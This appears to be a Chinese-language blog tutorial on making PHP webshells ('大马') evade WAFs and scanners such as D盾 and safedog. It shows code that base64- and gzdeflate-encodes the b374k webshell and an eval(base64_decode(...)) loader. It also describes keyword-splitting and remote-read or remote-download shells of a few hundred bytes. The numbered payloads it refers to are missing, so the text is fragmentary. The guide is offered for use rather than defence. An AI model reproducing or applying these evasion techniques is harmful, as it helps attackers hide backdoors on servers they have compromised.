PHP免杀大马的奇淫技巧

本文最后更新于可能会因为没有更新而失效。如已失效或需要修正，请留言！

Part 1

常见 PHP 大马 :

Part 2

大马后门检查: Fiddler 抓包

审计代码

这里我以 http://webshell8.com/ 这里的大马为例子演示

修改并运行脚本

Burp 抓包或者右键查看原代码

修改并运行代码

再使用 Burp 抓个包

查找关键字 GetHtml hmlogin localhost 等

把上图的 base64 代码解密下

Part 3

大马源码免杀

这里我使用的是国外的一款大马 b374k 来进行免杀。

执行代码 eval 或 preg_replace的/e修饰符 来执行大马代码。

$a = 'phpinfo();';
eval($a);
//eval执行 php 代码

编码

如果直接去执行代码，是过不了waf的，我们一般需要将大马源码进行编码。

$code= file_get_contents('D:\phpStudy\WWW\Test\Zlib\help.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

在线加解密码 点这里

这里我先将b374k的源码去掉 <?php ?> 后， base64 加密

解码

通过解码执行我们的代码。

那我们来试试解码并执行刚刚base64加密的大马。

<?php
eval(base64_decode('刚刚加密的代码'));
?>

关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(base64_decode('code'));
// 我们需要做的就是关键字免杀

免杀 payload 1 过狗过D盾 注意: code 就是我们刚刚 加密的base64 代码。

免杀

D盾规则库

免杀 payload 2

总结，源码免杀就到这里了，其实只需要些php基础，轻松免杀。

Part 4

只有几百字节的大马

首先我们需要了解，几百字节是什么概念 1kb = 1024b

那么我们怎么实现呢，2种思路 远程读取 和 远程下载

远程读取 payload 3

上传txt

免杀

payload 4

免杀

远程下载 payload 5

免杀

大小 最小的一百多字节，其他2个两百多字节那样子。

喜欢这篇文章的话就点一点 喜欢 吧！